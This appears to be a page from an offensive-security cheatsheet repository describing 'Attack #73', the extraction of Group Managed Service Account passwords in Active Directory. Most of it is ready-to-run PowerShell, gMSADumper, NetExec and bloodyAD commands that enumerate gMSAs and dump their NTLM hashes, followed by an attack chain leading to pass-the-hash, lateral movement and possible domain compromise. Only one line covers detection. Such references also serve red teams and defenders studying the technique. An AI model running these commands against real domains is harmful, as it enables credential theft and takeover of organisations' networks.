daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-73-gmsa-password-extraction.md (4074B)


      1 ---
      2 title: "Attack #73 β€” gMSA Password Extraction"
      3 description: "Group Managed Service Accounts (gMSAs) have their passwords automatically managed by AD and stored in the msDS-ManagedPassword attribute. Principals…"
      4 category: active-directory
      5 subcategory: "Advanced & Post-Exploitation"
      6 tags: ["active-directory", "credential-access", "ntlm", "privilege-escalation", "hashing"]
      7 tools: ["NetExec", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Ten/πŸ”· Attack #73 β€” gMSA Password Extraction.md"
     11 ---
     12 # πŸ”· Attack #73 β€” gMSA Password Extraction
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 Group Managed Service Accounts (gMSAs) have their passwords automatically managed by AD and stored in the `msDS-ManagedPassword` attribute. Principals authorized to retrieve this password (defined in `msDS-GroupMSAMembership`) can extract the NTLM hash of the gMSA. If a gMSA has privileged access (e.g., DA-equivalent or DCSync rights), extracting its hash = domain compromise.
     19 
     20 ***
     21 
     22 ## βš™οΈ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **Authorized to retrieve gMSA password** | Listed in `msDS-GroupMSAMembership` |
     27 | **Or compromise of an authorized server** | Servers hosting services running as gMSA |
     28 
     29 ***
     30 
     31 ## πŸ’» Full Commands
     32 
     33 ```powershell
     34 # ── Find gMSAs ────────────────────────────────────────────────────────────────
     35 Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword
     36 
     37 # ── Check who can read gMSA password ──────────────────────────────────────────
     38 Get-ADServiceAccount svc_gmsa -Properties PrincipalsAllowedToRetrieveManagedPassword |
     39   Select PrincipalsAllowedToRetrieveManagedPassword
     40 
     41 # ── Read gMSA password (if authorized) ────────────────────────────────────────
     42 # DSInternals:
     43 Install-Module DSInternals -Force
     44 $gmsa = Get-ADServiceAccount svc_gmsa -Properties msDS-ManagedPassword
     45 (ConvertFrom-ADManagedPasswordBlob $gmsa.'msDS-ManagedPassword').SecureCurrentPassword
     46 
     47 # ── GMSAPasswordReader (tool) ─────────────────────────────────────────────────
     48 .\GMSAPasswordReader.exe --AccountName svc_gmsa
     49 ```
     50 
     51 ```bash
     52 # ── gMSADumper (Linux) ────────────────────────────────────────────────────────
     53 python3 gMSADumper.py -u low_user -p 'Password1' -d corp.local -l DC01.corp.local
     54 
     55 # ── NetExec ───────────────────────────────────────────────────────────────────
     56 nxc ldap DC01.corp.local -u low_user -p 'Password1' --gmsa
     57 
     58 # ── bloodyAD ──────────────────────────────────────────────────────────────────
     59 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \
     60   get object 'svc_gmsa$' --attr msDS-ManagedPassword
     61 ```
     62 
     63 ***
     64 
     65 ## πŸ›‘οΈ Detection β€” Event IDs
     66 
     67 | Event ID | Source | What to Look For |
     68 |---|---|---|
     69 | **4662** | Security Log (DC) | Read access to `msDS-ManagedPassword` attribute |
     70 
     71 ***
     72 
     73 ## πŸ”— Attack Chain Context
     74 
     75 ```
     76 [gMSA] ──→ Extract managed password hash β†’ impersonate service account
     77          β”‚
     78          β”œβ”€β”€β†’ πŸ”‘ gMSA may have DA-equivalent rights or DCSync permissions
     79          β”œβ”€β”€β†’ πŸ”— PtH with gMSA hash β†’ lateral movement / privilege escalation
     80          └──→ πŸ’€ Defeated by: restrict gMSA password retrieval delegation
     81 ```
     82 
     83 ***
     84 
     85 > βœ… **Attack #73 β€” gMSA Password Extraction complete.**